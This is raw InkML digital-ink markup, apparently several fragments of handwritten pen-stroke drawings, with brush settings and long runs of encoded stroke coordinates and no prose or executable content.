0,-1 1 0,0 1 0,0 2 0,59 32 0,-35-16 0,81 50 0,-116-67 0,0-1 0,1 0 0,41 12 0,-47-18 0,-10-3 0,0 0 0,0 0 0,0 1 0,0 0 0,-1 0 0,13 8 0,-14-8-136,0 0-1,0-1 1,1 1-1,-1-1 1,0 0-1,1 0 1,0-1-1,-1 0 0,13 1 1,-1-1-6690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07.455"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 8329 24575,'4'-1'0,"1"0"0,-1 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,6-3 0,11-5 0,74-15 0,5-1 0,53-19 0,-36 13 0,-30 9-640,93-13-1,-57 14 755,221-36-4668,-225 40 3977,41-1 749,9-1-2499,-44-1 2047,342-51-910,-261 42 1190,152-15 0,-254 36 1132,170-39 0,97-48 1484,-330 85-2576,344-96-1332,-297 91 1207,-62 13 90,0-1 0,46-14 0,301-122-5,-243 89 0,72-26 0,-157 60 0,77-44 0,-13 6 0,9-6 34,-78 38-13,1 3 1,68-26 0,107-36-55,-86 31 455,-59 24-353,210-72-60,-132 62-9,33-11 0,14-15 0,111-41 0,-126 46-36,-99 33 0,118-51 1,-86 19-415,102-45-824,-184 90 1284,-8 3 214,1-1-1,-1-1 0,26-18 1,44-32-16,-21 15-215,81-69 0,-57 38 7,-58 49 0,-2-1 0,62-67 0,-81 79 211,0 0-1,1 2 1,1 0 0,32-19 0,-32 22-11,-1 0 1,0-1 0,-1-1 0,-1-1-1,27-30 1,45-54 1268,-71 82-1366,-4 4-103,1 2 0,0-1 0,19-10 0,19-14 0,-28 14 112,39-46 0,-51 53-61,1 0 0,0 0 0,1 1-1,1 1 1,0 0 0,1 1 0,0 1 0,20-10-1,-24 16-50,-1-1 0,1-1 0,-1 1 0,0-2 0,0 0 0,-1 0 0,0-1 0,-1 0 0,10-11 0,11-13 0,2 3 0,1 0 0,50-32 0,27-25 0,116-111 0,-67 64 0,-136 113 48,126-126 993,-118 115-1041,54-45 0,18-17 0,-55 38 0,-28 31 0,1 2 0,26-23 0,-9 9 0,-1-2 0,44-59 0,-22 24 0,21-27 0,-37 45 0,68-69 0,-86 99 51,-2-1 0,23-35 0,-23 30 16,39-43 0,-55 68-139,8-10 251,1 2 1,1 0-1,23-16 0,-31 25-179,-1-1 0,-1 0 0,1 0 0,-1-1 0,0 1 0,-1-2 0,0 1 0,0-1 0,7-14 0,-3 7 0,2 0 0,0 0 0,0 1 0,2 0 0,18-15 0,81-57 0,-82 64 0,-22 16 0,0-1 0,-1 0 0,0 0 0,9-14 0,-12 15 0,1-1 0,0 1 0,1 0 0,0 1 0,0-1 0,0 1 0,11-7 0,25-14 0,-1-3 0,-2-2 0,48-47 0,11-9 0,-3-3 0,-69 63 0,0 2 0,2 1 0,46-31 0,-11 13 0,-1-4 0,61-58 0,-59 58 0,-18 14 0,-7 4 0,-17 13 0,-1-1 0,0-1 0,37-41 0,-43 43 0,0 1 0,2 0 0,0 1 0,0 1 0,1 1 0,1 0 0,24-10 0,1-2 0,-33 17 0,-1-1 0,-1 0 0,16-16 0,10-8 0,-1 4 0,-22 16 0,1 1 0,1 0 0,0 1 0,21-10 0,33-20 0,-54 30 0,1 1 0,0 0 0,28-10 0,-19 8 0,0-1 0,0-1 0,-1-1 0,0-2 0,27-22 0,-43 31 0,11-5 0,0 1 0,1 1 0,24-9 0,-25 11 0,16-6 0,46-11 0,6-1 0,-55 15-109,0 0 0,1 3 0,0 1 0,49-5 0,-63 9 109,-1 0 0,1-2 0,-1 0 0,0-1 0,19-9 0,-11 4 0,35-9 0,-34 12 163,-1-2 1,45-22-1,-42 18-108,16-8-55,5 0 0,-1-3 0,56-38 0,-100 60 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,1 0 0,-1 0 0,10 0 0,-8 1 0,0-1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,10-6 0,-5 2 0,1 0 0,-1 1 0,1 0 0,0 1 0,0 1 0,0 0 0,14 0 0,-21 1 0,2 0 0,1-1 0,-1 0 0,1-1 0,-1 0 0,0 0 0,0-1 0,-1 0 0,1 0 0,8-8 0,-6 6 0,1-1 0,-1 1 0,23-8 0,35-7 0,-23 8 0,84-37 0,-97 36 0,69-19 0,-6 2 0,39-7 0,-98 26 0,1 2 0,63-8 0,3-2 0,-21 4 0,-42 8 0,67-20 0,45-16 0,-90 20 0,-35 12 0,0 2 0,47-11 0,-11 2 0,-52 15 0,0 0 0,0 1 0,1 0 0,0 0 0,21-1 0,36 4 0,-27 1 0,0-2 0,0-2 0,54-11 0,-60 7 0,0 1 0,0 2 0,63 1 0,-87 2 0,0 0 0,0-1 0,0 0 0,0-1 0,18-7 0,-17 5 0,0 1 0,1 1 0,-1 0 0,15-1 0,291 2 0,-155 5 0,482-3-732,-618 1 732,41 7 0,19 2 0,13-10-1243,-85 0-4973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30.814"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">193 0 24575,'-1'13'0,"1"0"0,1 0 0,0 0 0,1-1 0,0 1 0,1 0 0,1-1 0,0 0 0,0 0 0,1 0 0,1 0 0,0-1 0,0 0 0,10 12 0,35 44 0,-33-44 0,-1 0 0,17 34 0,-9-16 0,-16-27 0,0 1 0,-1 0 0,0 0 0,6 22 0,-13-33 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 1 0,0-1 0,0-1 0,-1 1 0,1 0 0,-4 2 0,-18 13 0,-31 19 0,32-23 0,-1 0 0,-1-2 0,0-1 0,-43 13 0,-25 11 0,83-30-36,1 1-1,0 0 0,1 0 0,-1 1 1,1 0-1,-7 8 0,0-1-1071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33.312"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 61 24575,'6'-1'0,"0"0"0,1 0 0,-1-1 0,0 0 0,0 0 0,0 0 0,10-7 0,18-5 0,-17 9 0,1-1 0,0 1 0,36-6 0,-52 11 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 1 0,1-1 0,-2 0 0,1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 3 0,1 10 0,0 0 0,-1 0 0,0 29 0,-2-36 0,2 52 0,0-37 0,0-1 0,-2 1 0,0-1 0,-2 0 0,-6 26 0,3-30 0,-2 0 0,-9 17 0,-10 24 0,2-6 0,17-38 0,1 0 0,-6 18 0,12-32 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,2 1 0,4 1 0,1-1 0,0 1 0,0-1 0,11-1 0,4 2 0,11 4-455,1-1 0,56 0 0,-73-5-6371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35.093"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">482 0 24575,'-7'1'0,"1"-1"0,0 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0 1 0,1-1 0,-9 6 0,-4 4 0,-29 25 0,-8 6 0,41-33 0,0 0 0,1 2 0,0 0 0,1 0 0,0 1 0,1 0 0,-15 25 0,18-23 0,1-1 0,-9 27 0,-12 25 0,18-49 0,1 0 0,0 1 0,2 0 0,0 0 0,1 1 0,0 0 0,2 0 0,-4 31 0,-2 23 0,5-53 0,-1 39 0,5-35 0,-1 0 0,-8 46 0,5-41 0,1 1 0,2 0 0,1 0 0,5 58 0,-4-82 0,1 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,7 7 0,-2-4 0,1-1 0,0 0 0,0 0 0,1-1 0,18 9 0,18 14 0,-37-22 0,0-1 0,0 0 0,0-1 0,20 9 0,-11-9 0,-1-1 0,1-1 0,0 0 0,0-2 0,29 0 0,11 1 0,-43 1 0,0-1 0,-1 2 0,1 0 0,-1 1 0,21 10 0,-22-9 0,0-1 0,0 0 0,0-1 0,1 0 0,0-1 0,16 1 0,-14-4 0,0-2 0,0 0 0,0 0 0,-1-2 0,1 0 0,0 0 0,-1-2 0,0 0 0,19-11 0,-23 12 0,1 0 0,-1-1 0,0-1 0,0 0 0,-1 0 0,0-1 0,0 0 0,-1-1 0,0 0 0,8-11 0,2-6 0,-15 21 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,3-9 0,1-3 0,2-1 0,0 2 0,0-1 0,2 1 0,0 0 0,12-14 0,20-33 0,-11 17 0,-25 38 0,0 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,-1 0 0,1-1 0,-2 1 0,1-1 0,-1 0 0,1-11 0,-3-1 0,1 1 0,1-1 0,1 1 0,1-1 0,1 1 0,13-34 0,-10 29 0,-1 0 0,0 0 0,-2-1 0,-1 0 0,-2 0 0,0 0 0,-2-1 0,-6-52 0,5 76 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-6-2 0,-1-1 0,-1 0 0,0 1 0,0 0 0,-1 1 0,-12-2 0,2 0 0,0-1 0,1-2 0,-31-14 0,-3 0 0,-4 2 0,0 2 0,-65-9 0,82 18 0,21 4 0,-1 1 0,1 1 0,-24 0 0,44 3-21,-11 0-248,1 0 0,-1-1 0,1 0 1,-21-5-1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38.393"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">15209 2042 24575,'-1'-1'0,"1"0"0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0-1 0,-1 1 0,0 0 0,-34-4 0,32 4 0,-349-3 0,181 6 0,147-5 0,-48-8 0,47 6 0,-45-3 0,-65-4 0,-10 0 0,122 11 0,-22 1 0,0-2 0,-77-12 0,94 9 0,0 2 0,-54 1 0,-14-1 0,37-8 0,44 6 0,0 1 0,-23-1 0,-62-7 0,68 6 0,-49-1 0,-766 7 0,823-2 0,-48-9 0,47 5 0,-45-2 0,49 7 0,0-1 0,0-1 0,-29-7 0,25 5 0,-1 1 0,1 1 0,-1 1 0,-28 3 0,-58-3 0,55-10 0,42 8 0,1-1 0,-26 0 0,-46 4 0,50 1 0,0-1 0,-61-9 0,57 3 0,1 3 0,-49 1 0,-26-1 0,7-18 0,70 15 0,-2-1 0,-77-2 0,-1511 10 0,1611-1 0,1 2 0,-29 7 0,27-6 0,0 1 0,-20 0 0,-27-4 0,25 0 0,0 2 0,-54 8 0,-67 12 0,138-18 0,0-1 0,-1-1 0,-42-3 0,-27 2 0,34 10 0,43-8 0,1 1 0,-26 0 0,6-2 0,-1 2 0,1 2 0,-63 17 0,12-8 0,67-13 0,1 1 0,1 0 0,-1 1 0,0 1 0,-23 10 0,-9 7 0,-64 19 0,16-7 0,36-11 0,0-4 0,-86 16 0,81-25 0,-83 15 0,116-19 0,-44 4 0,-6 0 0,-198 37 0,233-38 0,-70 23 0,28-6 0,45-14 0,12-3 0,-1 0 0,0-3 0,-55 4 0,74-8 0,1-1 0,-23 7 0,-24 2 0,-9 1 0,53-7 0,-1 0 0,-24 0 0,-127 9 0,52-3 0,19-1-57,-60 3-1025,135-11 1049,-44 8 0,-11 1 46,-452-7 879,272-6-592,222 3-300,1-1 0,-57-11 0,-71-10 0,59 13 0,65 7 0,-41-8 0,48 4 0,-11-3 0,1 2 0,-76-3 0,92 8 0,-1 0 0,1-3 0,-49-13 0,16 4 0,48 10 0,1 0 0,0 0 0,1-1 0,-1-1 0,1 1 0,0-2 0,0 0 0,1 0 0,-11-11 0,6 7 0,0 0 0,0 1 0,-17-9 0,-26-5 0,46 20 0,-1 0 0,1 0 0,1-1 0,-1-1 0,1 0 0,0 0 0,0-1 0,-15-13 0,3-1 0,0 1 0,-1 2 0,-1 0 0,-1 2 0,-29-15 0,43 24 0,0-1 0,1-1 0,0 0 0,0 0 0,-8-11 0,8 9 0,0 0 0,-1 1 0,-23-17 0,30 23 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,-2-10 0,1 8 0,0-1 0,0 1 0,-1 0 0,1 0 0,-10-13 0,-75-88 0,58 69 0,24 31 0,1 1 0,-1-1 0,-1 1 0,1 0 0,-11-8 0,10 9 0,1-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,2-1 0,-1 1 0,-4-12 0,-18-27 0,21 38 0,1-1 0,1 0 0,-1-1 0,1 1 0,1-1 0,0 0 0,0 0 0,-2-19 0,-4-15 0,6 36 0,0 0 0,0 0 0,-1 1 0,0-1 0,-1 1 0,-6-8 0,5 7 0,1-1 0,-1 0 0,-7-18 0,-30-79 0,-13-11 0,49 104 0,0 0 0,-1 1 0,-16-19 0,-2-5 0,4 0 0,2 0 0,-18-48 0,28 64 0,-1 0 0,-26-33 0,27 42 0,0 0 0,0 2 0,-1-1 0,-14-9 0,-7-6 0,-88-95 0,22 22 0,87 89 0,-1 1 0,0 0 0,0 1 0,-1 0 0,1 1 0,-2 1 0,-16-5 0,9 2 0,1 0 0,-20-11 0,-28-23 0,34 20 0,0 2 0,-47-20 0,63 33 0,0 1 0,0 1 0,-1 0 0,-18-2 0,-67-12 0,70 11 0,-1 2 0,0 1 0,-38 0 0,-509 6 0,559 1 0,0 0 0,0 2 0,1 0 0,-1 2 0,-39 15 0,7-3 0,30-12 0,21-6 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-4 4 0,6-4-1365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39.807"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">343 0 24575,'-3'2'0,"1"0"0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-3 4 0,-4 5 0,-87 88 0,59-65 0,-13 23 0,31-35 0,-28 49 0,15-23 0,27-43 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,0-1 0,0 1 0,-2 11 0,4-14 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,6 5 0,5 7 0,1-1 0,27 21 0,-35-30 0,1 0 0,0-1 0,0 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,13 1 0,-15-3-80,0 0 0,0 0-1,0 1 1,0 0 0,0 0-1,0 1 1,0 0 0,-1 0-1,0 1 1,1-1 0,-1 1 0,0 1-1,-1-1 1,1 1 0,-1 0-1,8 9 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43.487"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 19 24575,'45'-16'0,"-43"15"0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 3 0,1 9 0,0 1 0,-1 0 0,-1 0 0,-3 25 0,2-12 0,1 34 0,2-44 0,-2-1 0,0 0 0,-1 0 0,0 1 0,-2-1 0,0 0 0,0 0 0,-10 23 0,35-50 0,-9 4 0,-1-1 0,1 2 0,0-1 0,22-4 0,7 6 0,0 3 0,69 6 0,-109-5 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,0 2 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 5 0,-1 2 0,0 0 0,-1 0 0,0 0 0,-1-1 0,0 1 0,-1-1 0,-7 15 0,-21 29 0,21-37 0,0 0 0,2 0 0,-14 32 0,22-44-114,-1-1 1,0 0-1,0 0 0,-1 0 0,0-1 1,1 1-1,-1 0 0,0-1 0,0 0 1,-1 0-1,-5 5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46.386"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">501 1 24575,'-3'0'0,"-14"0"0,0 0 0,0 0 0,0 2 0,1 0 0,-1 1 0,0 0 0,-19 8 0,3 2 0,14-7 0,1 1 0,0 1 0,0 1 0,1 0 0,0 1 0,1 1 0,-25 21 0,34-25 0,-1 1 0,1 0 0,0 1 0,1-1 0,-1 1 0,2 1 0,0-1 0,0 1 0,0 0 0,1 0 0,1 0 0,0 1 0,0-1 0,1 1 0,0 0 0,0 17 0,-12 80 0,7-64 0,-3 5 0,6-31 0,1-1 0,-2 30 0,4-28 0,-9 37 0,6-36 0,-2 37 0,5-31 0,3 165 0,-1-183 0,1 0 0,0 0 0,0-1 0,1 1 0,0-1 0,6 11 0,10 28 0,-15-34 0,1 1 0,0-1 0,1 0 0,0 0 0,1-1 0,9 13 0,56 63 0,-38-47 0,-26-33 0,0 1 0,1-1 0,-1-1 0,1 0 0,0 0 0,1-1 0,0 0 0,17 7 0,21 10 0,-25-10 0,23 15 0,-41-23 0,1-1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,9 0 0,4 0 0,0-1 0,21-3 0,-34 2 0,-1 0 0,1-1 0,0 0 0,0 0 0,-1-1 0,0 1 0,1-1 0,-1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,5-6 0,27-20 0,-23 18 0,0 0 0,-1-1 0,0 0 0,-1-1 0,-1 0 0,0-1 0,16-30 0,-13 21 0,-4 10 0,-1 0 0,-1-1 0,-1 0 0,0 0 0,-1-1 0,7-28 0,-6 11 0,-1 0 0,-1 0 0,-1-43 0,-3 28 0,1 28 0,-2 0 0,0 0 0,-2 0 0,-4-22 0,3 32 0,-1 0 0,0 0 0,-1 1 0,0 0 0,-12-17 0,10 16 0,1 0 0,0 0 0,0-1 0,-5-16 0,-6-23 0,-17-67 0,32 110 0,-1-8 0,-1 0 0,-9-25 0,12 36 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-6-3 0,-3 0-136,1 0-1,1-1 1,-1 0-1,1-1 1,0 0-1,0-1 1,1 0-1,0 0 0,-11-14 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58.901"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 4 24575,'0'-3'0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7:59.364"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'0'0'-8191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30T14:28:00.165"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>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08.891"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">196 1 24575,'1'8'0,"1"1"0,0-1 0,1 1 0,0-1 0,0 0 0,0 0 0,1 0 0,1-1 0,-1 1 0,1-1 0,0 0 0,13 13 0,-9-8 0,-1 1 0,-1 0 0,1 1 0,9 28 0,-3-9 0,-12-29 0,0 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,0 0 0,-3 4 0,-4 4 0,-1 0 0,0-1 0,-1 0 0,-21 16 0,2-1 0,8-7 0,-15 16 0,0 9 0,22-27 0,1 0 0,0 1 0,-15 27 0,26-39-227,0 0-1,-1-1 1,0 1-1,0-1 1,-10 9-1,5-6-6598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20.713"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 8263 24575,'2258'0'-592,"-2227"-1"592,41-7 0,-42 3 0,44 0 0,-53 4 305,41-7 0,6-1-323,1-1 18,-49 6 0,37-2 0,-6 3 0,63-13 0,-66 8 0,81-3 0,-61 7-439,79-14-1,-140 17 489,342-40-49,-167 27-1434,-117 12 1493,71-12 0,244-38-59,-95 15-1888,5 9 1455,-15 2-141,-134 12-76,58-8 707,-87 2-57,109-13 0,396-44 1892,-522 61-1892,120-17 0,-136 22 0,-32 4 0,59-1 0,-54 5 172,-1-1 0,93-22-1,100-41 658,-105 26-628,159-40-89,-216 52-95,-65 22 21,0 0 1,0 2-1,1 0 1,35-5-1,-21 5-28,0 0-1,0-2 1,52-18-1,68-17-24,-44 14 181,106-30-1514,129-40 1155,-212 63-301,-84 24 495,86-32 0,23-12-173,-13 4-967,10-9 1112,-27 12 281,143-76 0,-192 80-215,113-56-42,-141 80 3,-30 14 0,0-2 0,28-16 0,48-34 0,222-129 0,-36 22 1591,-216 117-962,-46 33-532,2 0-1,0 1 1,42-21 0,-38 24-97,-1-1 0,0 0 0,-1-2 0,40-31 0,8-13-341,138-84 0,-15 12 341,-115 74 0,86-45 0,-128 79-92,-1-1 0,43-36-1,-53 38-223,104-72 316,-39 27 0,-49 38 0,58-52 0,-60 42 43,79-79 638,-72 66-72,38-49 562,-17 20-698,-28 34-268,-34 39-205,197-223 0,-65 100 0,-16 24 0,-63 56 0,118-87 0,-103 80 0,24-21 0,-70 56 0,0 1 0,2 1 0,1 2 0,0 0 0,36-13 0,-18 8 0,-32 13 0,0 0 0,30-25 0,6-5 0,-25 20 0,0-1 0,36-38 0,-61 56 0,76-58 0,-38 21 0,1 1 0,74-51 0,5-9 0,-36 27 0,-41 39 0,-27 23 0,-1-2 0,0-1 0,-1 0 0,-1 0 0,0-2 0,16-20 0,-23 27 0,0 0 0,0 1 0,0-1 0,1 2 0,0-1 0,1 1 0,-1 1 0,1-1 0,11-4 0,32-23 0,94-95 0,-68 57 0,-63 59 0,1 0 0,33-17 0,-33 20 0,0-1 0,0 0 0,23-20 0,131-140 0,-161 162 0,1 0 0,1 1 0,-1 0 0,22-10 0,23-14 0,5-17 0,-37 28 0,48-31 0,-56 42 0,106-68 0,-38 21 0,-48 34 0,49-41 0,-54 37 0,-15 14 0,-2 0 0,0 0 0,18-21 0,-23 21 0,0 2 0,0-1 0,0 1 0,1 0 0,0 1 0,0 0 0,16-10 0,-17 13 0,0 0 0,0-1 0,-1 0 0,0 0 0,8-11 0,-8 9 0,0 1 0,1 0 0,-1 1 0,17-12 0,-2 2 0,0 0 0,-2-1 0,26-28 0,-29 27 0,1 1 0,1 1 0,0 1 0,29-18 0,-37 27 0,0 0 0,0-1 0,0 0 0,-1-1 0,0 0 0,-1-1 0,14-17 0,59-61 0,-69 72 0,0 1 0,1 1 0,1 0 0,0 1 0,1 0 0,0 1 0,27-14 0,-21 11 0,-1 0 0,-1-1 0,-1-1 0,0 0 0,-1-2 0,-1 0 0,27-40 0,-37 51 0,1-1 0,0 1 0,0 1 0,0 0 0,19-12 0,-17 12 0,-1 1 0,1-2 0,-1 1 0,-1-2 0,10-9 0,36-51 0,30-42 0,-70 93 0,1 1 0,1 1 0,0 0 0,1 1 0,21-14 0,-12 10 0,34-36 0,-53 47 0,0 0 0,-1-1 0,0 0 0,-1 0 0,0 0 0,5-14 0,5-7 0,-12 23 0,-1 1 0,1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,0 1 0,0 1 0,0-1 0,0 0 0,1 1 0,9-7 0,-7 6 0,0 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1 0 0,-1 0 0,8-14 0,-8 13 0,0-1 0,1 1 0,0-1 0,0 2 0,1-1 0,9-6 0,53-45 106,-49 40-841,37-27-1,-47 39-6090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22.586"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 39 24575,'27'0'0,"0"0"0,1 0 0,0-2 0,43-8 0,-47 4 0,-4 1 0,1 0 0,0 1 0,0 1 0,35 0 0,-54 3 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 3 0,0 10 0,0 0 0,-1-1 0,-3 23 0,1-12 0,1 71-1365,1-79-5461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26.839"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 4 24575,'3'0'0,"1"-3"0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1:56:28.352"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1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22:02:34.505"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
